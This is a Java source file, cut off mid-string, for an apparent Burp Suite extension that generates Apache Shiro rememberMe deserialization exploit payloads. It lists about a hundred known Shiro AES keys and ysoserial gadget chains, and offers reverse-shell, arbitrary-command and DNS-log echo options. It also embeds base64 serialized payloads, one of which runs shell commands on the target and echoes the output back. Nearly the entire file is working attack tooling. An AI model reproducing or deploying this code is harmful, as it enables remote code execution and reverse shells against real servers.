package burp;

import org.apache.shiro.codec.Base64;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;
import ysoserial.GeneratePayload;
import ysoserial.payloads.*;

import javax.swing.*;
import java.awt.*;
import java.awt.event.*;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.net.MalformedURLException;
import java.net.Socket;

public class GenPayload extends JDialog {
    private JPanel contentPane;
    private JPanel buttonPane;
    private JPanel comboxPane;
    private JButton buttonOK;
    private JButton buttonCancel;
    private JComboBox selectKeys;
    private JComboBox selectEchos;
    private JComboBox selectGadgets;
    public static boolean bool=false;
    String[] keys = new String[]{
            "kPH+bIxk5D2deZiIxcaaaA=="
            ,"4AvVhmFLUs0KTA3Kprsdag=="
            ,"Z3VucwAAAAAAAAAAAAAAAA=="
            ,"fCq+/xW488hMTCD+cmJ3aQ=="
            ,"0AvVhmFLUs0KTA3Kprsdag=="
            ,"1AvVhdsgUs0FSA3SDFAdag=="
            ,"1QWLxg+NYmxraMoxAXu/Iw=="
            ,"25BsmdYwjnfcWmnhAciDDg=="
            ,"2AvVhdsgUs0FSA3SDFAdag=="
            ,"3AvVhmFLUs0KTA3Kprsdag=="
            ,"3JvYhmBLUs0ETA5Kprsdag=="
            ,"r0e3c16IdVkouZgk1TKVMg=="
            ,"5aaC5qKm5oqA5pyvAAAAAA=="
            ,"5AvVhmFLUs0KTA3Kprsdag=="
            ,"6AvVhmFLUs0KTA3Kprsdag=="
            ,"6NfXkC7YVCV5DASIrEm1Rg=="
            ,"6ZmI6I2j5Y+R5aSn5ZOlAA=="
            ,"cmVtZW1iZXJNZQAAAAAAAA=="
            ,"7AvVhmFLUs0KTA3Kprsdag=="
            ,"8AvVhmFLUs0KTA3Kprsdag=="
            ,"8BvVhmFLUs0KTA3Kprsdag=="
            ,"9AvVhmFLUs0KTA3Kprsdag=="
            ,"OUHYQzxQ/W9e/UjiAGu6rg=="
            ,"a3dvbmcAAAAAAAAAAAAAAA=="
            ,"aU1pcmFjbGVpTWlyYWNsZQ=="
            ,"bWljcm9zAAAAAAAAAAAAAA=="
            ,"bWluZS1hc3NldC1rZXk6QQ=="
            ,"bXRvbnMAAAAAAAAAAAAAAA=="
            ,"ZUdsaGJuSmxibVI2ZHc9PQ=="
            ,"wGiHplamyXlVB11UXWol8g=="
            ,"U3ByaW5nQmxhZGUAAAAAAA=="
            ,"MTIzNDU2Nzg5MGFiY2RlZg=="
            ,"L7RioUULEFhRyxM7a2R/Yg=="
            ,"a2VlcE9uR29pbmdBbmRGaQ=="
            ,"WcfHGU25gNnTxTlmJMeSpw=="
            ,"OY//C4rhfwNxCQAQCrQQ1Q=="
            ,"5J7bIJIV0LQSN3c9LPitBQ=="
            ,"f/SY5TIve5WWzT4aQlABJA=="
            ,"bya2HkYo57u6fWh5theAWw=="
            ,"WuB+y2gcHRnY2Lg9+Aqmqg=="
            ,"kPv59vyqzj00x11LXJZTjJ2UHW48jzHN"
            ,"3qDVdLawoIr1xFd6ietnwg=="
            ,"ZWvohmPdUsAWT3=KpPqda"
            ,"YI1+nBV//m7ELrIyDHm6DQ=="
            ,"6Zm+6I2j5Y+R5aS+5ZOlAA=="
            ,"2A2V+RFLUs+eTA3Kpr+dag=="
            ,"6ZmI6I2j3Y+R1aSn5BOlAA=="
            ,"SkZpbmFsQmxhZGUAAAAAAA=="
            ,"2cVtiE83c4lIrELJwKGJUw=="
            ,"fsHspZw/92PrS3XrPW+vxw=="
            ,"XTx6CKLo/SdSgub+OPHSrw=="
            ,"sHdIjUN6tzhl8xZMG3ULCQ=="
            ,"O4pdf+7e+mZe8NyxMTPJmQ=="
            ,"HWrBltGvEZc14h9VpMvZWw=="
            ,"rPNqM6uKFCyaL10AK51UkQ=="
            ,"Y1JxNSPXVwMkyvES/kJGeQ=="
            ,"lT2UvDUmQwewm6mMoiw4Ig=="
            ,"MPdCMZ9urzEA50JDlDYYDg=="
            ,"xVmmoltfpb8tTceuT5R7Bw=="
            ,"c+3hFGPjbgzGdrC+MHgoRQ=="
            ,"ClLk69oNcA3m+s0jIMIkpg=="
            ,"Bf7MfkNR0axGGptozrebag=="
            ,"1tC/xrDYs8ey+sa3emtiYw=="
            ,"ZmFsYWRvLnh5ei5zaGlybw=="
            ,"cGhyYWNrY3RmREUhfiMkZA=="
            ,"IduElDUpDDXE677ZkhhKnQ=="
            ,"yeAAo1E8BOeAYfBlm4NG9Q=="
            ,"cGljYXMAAAAAAAAAAAAAAA=="
            ,"2itfW92XazYRi5ltW0M2yA=="
            ,"XgGkgqGqYrix9lI6vxcrRw=="
            ,"ertVhmFLUs0KTA3Kprsdag=="
            ,"5AvVhmFLUS0ATA4Kprsdag=="
            ,"s0KTA3mFLUprK4AvVhsdag=="
            ,"hBlzKg78ajaZuTE0VLzDDg=="
            ,"9FvVhtFLUs0KnA3Kprsdyg=="
            ,"d2ViUmVtZW1iZXJNZUtleQ=="
            ,"yNeUgSzL/CfiWw1GALg6Ag=="
            ,"NGk/3cQ6F5/UNPRh8LpMIg=="
            ,"4BvVhmFLUs0KTA3Kprsdag=="
            ,"MzVeSkYyWTI2OFVLZjRzZg=="
            ,"CrownKey==a12d/dakdad"
            ,"empodDEyMwAAAAAAAAAAAA=="
            ,"A7UzJgh1+EWj5oBFi+mSgw=="
            ,"c2hpcm9fYmF0aXMzMgAAAA=="
            ,"i45FVt72K2kLgvFrJtoZRw=="
            ,"U3BAbW5nQmxhZGUAAAAAAA=="
            ,"ZnJlc2h6Y24xMjM0NTY3OA=="
            ,"Jt3C93kMR9D5e8QzwfsiMw=="
            ,"MTIzNDU2NzgxMjM0NTY3OA=="
            ,"vXP33AonIp9bFwGl7aT7rA=="
            ,"V2hhdCBUaGUgSGVsbAAAAA=="
            ,"Q01TX0JGTFlLRVlfMjAxOQ=="
            ,"ZAvph3dsQs0FSL3SDFAdag=="
            ,"Is9zJ3pzNh2cgTHB4ua3+Q=="
            ,"NsZXjXVklWPZwOfkvk6kUA=="
            ,"GAevYnznvgNCURavBhCr1w=="
            ,"66v1O8keKNV3TTcGPK1wzg=="
            ,"SDKOLKn2J1j/2BHjeZwAoQ=="
    };

    String[] gadgets={
            "CommonsBeanutils1",
            "CommonsBeanutils2",
            "CommonsCollections3",
            "CommonsCollections4",
            "CommonsCollections10",
           // "CommonsCollections11",
            "Jdk7u21",
           // "JRE8u20",
            "ROME",
            "JSON1"
    };

    String[] echos={
            "TomcatEcho",
            "SpringEcho",
           // "WeblogicEcho",
            "HttpEcho",
            "DnsLogEcho",
            "ReverseShell",
            "CMD"
    };
    public GenPayload() throws Exception {
        setSize(600,370);//这句要写在前面
        setLocationRelativeTo(null);//这句可让窗体自动居中屏幕
        contentPane=new JPanel();
        buttonPane=new JPanel();
        comboxPane=new JPanel();
        buttonOK=new JButton("确定");
        buttonCancel=new JButton("取消");
        selectKeys=new JComboBox();
        selectGadgets=new JComboBox();
        selectEchos=new JComboBox();

        setContentPane(contentPane);

        setModal(true);
        getRootPane().setDefaultButton(buttonOK);
        contentPane.setLayout(new GridLayout(3,1));

        contentPane.add(comboxPane);
        contentPane.add(buttonPane);

        comboxPane.add(selectKeys);
        comboxPane.add(selectGadgets);
        comboxPane.add(selectEchos);


        buttonPane.add(buttonOK);
        buttonPane.add(buttonCancel);

        buttonOK.addActionListener(new ActionListener() {
            public void actionPerformed(ActionEvent e) {
                onOK();
            }
        });

        buttonCancel.addActionListener(new ActionListener() {
            public void actionPerformed(ActionEvent e) {
                onCancel();
            }
        });

        // call onCancel() when cross is clicked
        setDefaultCloseOperation(DO_NOTHING_ON_CLOSE);
        addWindowListener(new WindowAdapter() {
            public void windowClosing(WindowEvent e) {
                onCancel();
            }
        });
        for (String key:keys) {
            selectKeys.addItem(key);
        }
        for (String gadget:gadgets) {
            selectGadgets.addItem(gadget);
        }
        for (String echo:echos) {
            selectEchos.addItem(echo);
        }
        // call onCancel() on ESCAPE
        contentPane.registerKeyboardAction(new ActionListener() {
            public void actionPerformed(ActionEvent e) {
                onCancel();
            }
        }, KeyStroke.getKeyStroke(KeyEvent.VK_ESCAPE, 0), JComponent.WHEN_ANCESTOR_OF_FOCUSED_COMPONENT);

    }

    public String gen() throws Exception {
        String key=selectKeys.getSelectedItem().toString();
        String gadget=selectGadgets.getSelectedItem().toString();
        String echo=selectEchos.getSelectedItem().toString();
        String rememberMe="";
        byte[] bytes=null;
        if(echo.equals("ReverseShell")){
            String reverseShell = JOptionPane.showInputDialog("Please input a ip:port \nReverseShell 127.0.0.1:80");
            echo="connectback:"+reverseShell;
        }
        if(echo.equals("CMD")){
            String cmd = JOptionPane.showInputDialog("Please input a command \nCMD nslookup dnslog.cn");
            echo=cmd;
        }
        if(echo.equals("DnsLogEcho")){
            String dnsEcho = JOptionPane.showInputDialog("Please input a  cmd;dnslog.cn\nDnsLogEcho whoami;dnslog.cn");
            echo="DnsLogEcho:"+dnsEcho;
        }
        if(gadget.equals("CommonsBeanutils2")){
            if(echo.equals("TomcatEcho")){
                bytes = Base64.decode("rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LPjgGC/k7xfgIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAISQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WgAVX3VzZVNlcnZpY2VzTWVjaGFuaXNtTAALX2F1eENsYXNzZXN0ADtMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvSGFzaHRhYmxlO1sACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAETAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA/////wBwdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAADprK/rq+AAAAMwDsCgAZAGoKABcAawoAbABtCgBsAG4KABkAbwoAcABxCgBwAHIIAHMKAD4AdAcAXAoAcAB1CAB2CgAmAHcIAHgIAHkIAHoIAHsHAHwHAH0IAH4KABcAfwgAgAcAgQoAFwCCBwCDCgCEAIUIAIYHAIcKABwAiAsAiQCKCwCJAIsIAIwHAI0IAI4KAI8AkAoAJgCRCACSBwCTCACUCACVCABRCgAhAJYIAJcIAJgHAJkHAJoKAC4AmwoALgCcCgCdAJ4KAC0AnwgAoAoALQChCgAtAKIKACEAowgApAoApQCmCgBwAKcIAKgKAKkAqgoAqwCsCgClAK0HAK4BAARnZXRPAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAJEx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9Ub21jYXRFY2hvOwEAAW8BABJMamF2YS9sYW5nL09iamVjdDsBAAFzAQASTGphdmEvbGFuZy9TdHJpbmc7AQABZgEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAApFeGNlcHRpb25zAQAGPGluaXQ+AQADKClWAQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAA2NtZAEAE1tMamF2YS9sYW5nL1N0cmluZzsBAANzdHIBAAFyAQAbTG9yZy9hcGFjaGUvY295b3RlL1JlcXVlc3Q7AQABcAEAAmkkAQAUTGphdmEvdXRpbC9JdGVyYXRvcjsBAAF0AQASTGphdmEvbGFuZy9UaHJlYWQ7AQAEYXJyJAEAE1tMamF2YS9sYW5nL1RocmVhZDsBAARsZW4kAQABSQEADVN0YWNrTWFwVGFibGUHAK4HAJMHAK8HAHwHAIMHALAHAI0HAFIBAApTb3VyY2VGaWxlAQAPVG9tY2F0RWNoby5qYXZhDACxALIMALMAtAcAtQwAtgC3DAC4ALkMAE0ATgcArwwAugC7DAC8AL0BAAd0aHJlYWRzDAA/AEAMAL4AvwEABGV4ZWMMAMAAwQEABGh0dHABAAZ0YXJnZXQBAAZ0aGlzJDABAAdoYW5kbGVyAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAK29yZy9hcGFjaGUvdG9tY2F0L3V0aWwvbmV0L0Fic3RyYWN0RW5kcG9pbnQBAAZnbG9iYWwMAMIAsgEACWdldEdsb2JhbAEAD2phdmEvbGFuZy9DbGFzcwwAwwDEAQAQamF2YS9sYW5nL09iamVjdAcAxQwAxgDHAQAKcHJvY2Vzc29ycwEAE2phdmEvdXRpbC9BcnJheUxpc3QMAMgAyQcAsAwAygDLDADMAM0BAANyZXEBABlvcmcvYXBhY2hlL2NveW90ZS9SZXF1ZXN0AQAHb3MubmFtZQcAzgwAzwDQDADRAL8BAAZ3aW5kb3cBABBqYXZhL2xhbmcvU3RyaW5nAQAHY21kLmV4ZQEAAi9jDADSANABAAcvYmluL3NoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgwATQDTDADUANUHANYMANcA2AwATQDZAQACXEEMANoA2wwAzAC/DADcAN0BAAlTZXJ2ZXItb2sHAN4MAN8A4AwA4QDiAQABLwcA4wwA5ADlBwDmDADnAL8MAOgA4AEAInlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL1RvbWNhdEVjaG8BABBqYXZhL2xhbmcvVGhyZWFkAQASamF2YS91dGlsL0l0ZXJhdG9yAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEADmdldFRocmVhZEdyb3VwAQAZKClMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAB2dldE5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQANZ2V0U3VwZXJjbGFzcwEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEACGl0ZXJhdG9yAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwEAB2hhc05leHQBAAMoKVoBAARuZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAJZ2V0SGVhZGVyAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQALZ2V0UmVzcG9uc2UBAB4oKUxvcmcvYXBhY2hlL2NveW90ZS9SZXNwb25zZTsBABpvcmcvYXBhY2hlL2NveW90ZS9SZXNwb25zZQEACXNldEhlYWRlcgEAJyhMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZzspVgEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBAAtnZXRSZXNvdXJjZQEAIihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbmV0L1VSTDsBAAxqYXZhL25ldC9VUkwBAAdnZXRQYXRoAQAJYWRkSGVhZGVyAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAcA6QoA6gBvACEAPgDqAAAAAAACAAEAPwBAAAIAQQAAAGQAAgAEAAAAFCu2AAEstgACTi0EtgADLSu2AASwAAAAAgBCAAAADgADAAAAEQAJABIADgATAEMAAAAqAAQAAAAUAEQARQAAAAAAFABGAEcAAQAAABQASABJAAIACQALAEoASwADAEwAAAAEAAEAEgABAE0ATgACAEEAAAM8AAUADAAAAXMqtwDrKrgABrYABxIItgAJwAAKwAAKTi2+NgQDNgUVBRUEogFQLRUFMjoGGQa2AAtNLBIMtgANmgE1LBIOtgANmQEsKioqGQYSD7YACRIQtgAJEhG2AAlMpwArOgcqKhkGEg+2AAkSELYACUwTABMSEbYAAjoIGQgEtgADGQgrtgAETCorEhS2AAlMpwAeOgcrtgABtgAVEhYDvQAXtgAYKwO9ABm2ABpMKisSG7YACcAAHLYAHToHGQe5AB4BAJkAqhkHuQAfAQA6CCoZCBIgtgAJwAAhOgkSIrgAI7YAJBIltgANmQAeBr0AJlkDEidTWQQSKFNZBRkJEim2ACpTpwAbBr0AJlkDEitTWQQSLFNZBRkJEim2ACpTOgq7AC1ZuwAuWRkKtwAvtgAwtgAxtwAyEjO2ADS2ADU6CxkJtgA2EjcZC7YAOKcAHToKGQm2ADYSN7gABrYAORI6tgA7tgA8tgA9p/9SpwAJhAUBp/6vsQADAEMAWABbABIAgwCLAI4AEgDYAUkBTAASAAMAQgAAAG4AGwAAABYABAAZACsAGgAxABsAQwAdAFgAJABbAB4AXQAgAGwAIQB2ACIAfAAjAIMAJwCLACsAjgAoAJAAKgCpACwAywAtANgALwEdADABPQAxAUkANgFMADMBTgA0AWYANwFpADgBbAAZAXIAOwBDAAAAogAQAHYADQBKAEsACABdACYATwBQAAcAkAAZAE8AUAAHAR0ALABRAFIACgE9AAwAUwBJAAsBTgAYAE8AUAAKANgAjgBUAFUACQDLAJsAVgBHAAgAuACxAFcAWAAHAFgBFABGAEcAAQArAUEAWQBaAAYAMQFBAEgASQACABcBWwBbAFwAAwAbAVcAXQBeAAQAHgFUAFcAXgAFAAABcwBEAEUAAABfAAAAgwAN/wAeAAYHAGAAAAcACgEBAAD/ADwABwcAYAAHAGEHAAoBAQcAYgABBwBj/wAnAAcHAGAHAGQHAGEHAAoBAQcAYgAASgcAYxr8AA4HAGX9AEoHAGQHAGZXBwBncAcAY/kAGfoAAv8AAgAGBwBgAAcAYQcACgEBAAD/AAUAAQcAYAAAAEwAAAAEAAEAEgABAGgAAAACAGlwdAABYXB3AQB4cQB+AA54");
            }
            if(echo.equals("HttpEcho")){
                bytes = Base64.decode("rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LPjgGC/k7xfgIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAISQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WgAVX3VzZVNlcnZpY2VzTWVjaGFuaXNtTAALX2F1eENsYXNzZXN0ADtMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvSGFzaHRhYmxlO1sACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAETAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA/////wBwdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAEjDK/rq+AAAAMwEGCgAaAIoJAEUAiwkARQCMBwCNCgAEAIoJAEUAjgkARQCPCACQCgCRAJIJAEUAkwgAlAkARQCVBwCWCgANAJcKAJgAmQoARQCaCgAEAJsKAAQAnAoARQCdCgAaAJ4KABcAnwgAoAcAoQcAogoAFwCjBwCkCABPCgClAKYJAEUApwgAqAoAqQCqCgAYAKsIAKwKABgArQgArggArwgAsAgAsQkARQCyCABmBwCzBwC0CgAqAJcHALUKACwAlwcAtgoALgCXCAC3BwC4BwC5CgC6ALsKALoAvAoAvQC+CgAyAL8IAMAKADIAwQoAMgDCCgAxAMMKADEAxAoAMQDFCgAXAMYKAMcAyAoAxwDJCgAXAMoKAEUAywcAfAoAFwDMCgCYAM0HAM4BAAFoAQATTGphdmEvdXRpbC9IYXNoU2V0OwEACVNpZ25hdHVyZQEAJ0xqYXZhL3V0aWwvSGFzaFNldDxMamF2YS9sYW5nL09iamVjdDs+OwEAAmNsAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAANoc3IBABFMamF2YS9sYW5nL0NsYXNzOwEAA2hzcAEAA2NtZAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQABcgEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAAXABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQABZQEAIkxqYXZhL2xhbmcvQ2xhc3NOb3RGb3VuZEV4Y2VwdGlvbjsBAAR0aGlzAQAcTHlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0hFOwEADVN0YWNrTWFwVGFibGUHAM4HAJYBAAFpAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQADb2JqAQAWKExqYXZhL2xhbmcvT2JqZWN0O0kpVgEAC2dldFJlc3BvbnNlAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBACJMamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb247AQAtTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25UYXJnZXRFeGNlcHRpb247AQAhTGphdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb247AQACcHcBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAFvAQAFZGVwdGgBAAFJBwBSBwCzBwC0BwC1BwC2BwCkBwC4AQAKRXhjZXB0aW9ucwEAAUYBAAFxAQAEYXJyJAEAE1tMamF2YS9sYW5nL09iamVjdDsBAARsZW4kAQACaSQBAA1kZWNsYXJlZEZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAGltMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAFc3RhcnQBAAFuBwChBwCBBwDPAQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAHSEUuamF2YQwAVgBXDABTAFQMAFUAVAEAEWphdmEvdXRpbC9IYXNoU2V0DABGAEcMAEoASwEAJWphdmF4LnNlcnZsZXQuaHR0cC5IdHRwU2VydmxldFJlcXVlc3QHANAMANEA0gwATABNAQAmamF2YXguc2VydmxldC5odHRwLkh0dHBTZXJ2bGV0UmVzcG9uc2UMAE4ATQEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uDADTAFcHANQMANUA1gwAeQBlDADXAGMMANgAYwwAYgBjDADZANoMANsA3AEACWdldEhlYWRlcgEAD2phdmEvbGFuZy9DbGFzcwEAEGphdmEvbGFuZy9TdHJpbmcMAN0A3gEAEGphdmEvbGFuZy9PYmplY3QHAN8MAOAA4QwATwBQAQAHb3MubmFtZQcA4gwA4wDkDADlAOYBAAN3aW4MANcA5wEAB2NtZC5leGUBAAIvYwEACS9iaW4vYmFzaAEAAi1jDABRAFIBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAgamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb24BACtqYXZhL2xhbmcvcmVmbGVjdC9JbnZvY2F0aW9uVGFyZ2V0RXhjZXB0aW9uAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgEACWdldFdyaXRlcgEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABFqYXZhL3V0aWwvU2Nhbm5lcgcA6AwA6QDqDADrAOwHAO0MAO4A7wwAVgDwAQACXEEMAPEA8gwA8wDmDAD0APUMAPYAVwwA9wBXDAD4APkHAM8MAPoA+wwA/AD9DAD+AP8MAFUAZQwBAADaDAEBAQIBABp5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9IRQEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAD3ByaW50U3RhY2tUcmFjZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBAAhjb250YWlucwEAA2FkZAEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEGlzQXNzaWduYWJsZUZyb20BABQoTGphdmEvbGFuZy9DbGFzczspWgEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAUKClMamF2YS9sYW5nL1N0cmluZzsBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEABG5leHQBAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAFZmx1c2gBAAVjbG9zZQEAEWdldERlY2xhcmVkRmllbGRzAQAcKClbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdpc0FycmF5AQADKClaAQANZ2V0U3VwZXJjbGFzcwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwEDCgEEAIoAIQBFAQQAAAAIAAgARgBHAAEASAAAAAIASQAIAEoASwAAAAgATABNAAAACABOAE0AAAAIAE8AUAAAAAgAUQBSAAAACABTAFQAAAAIAFUAVAAAAAUAAQBWAFcAAQBYAAAAtgACAAIAAAA8KrcBBQG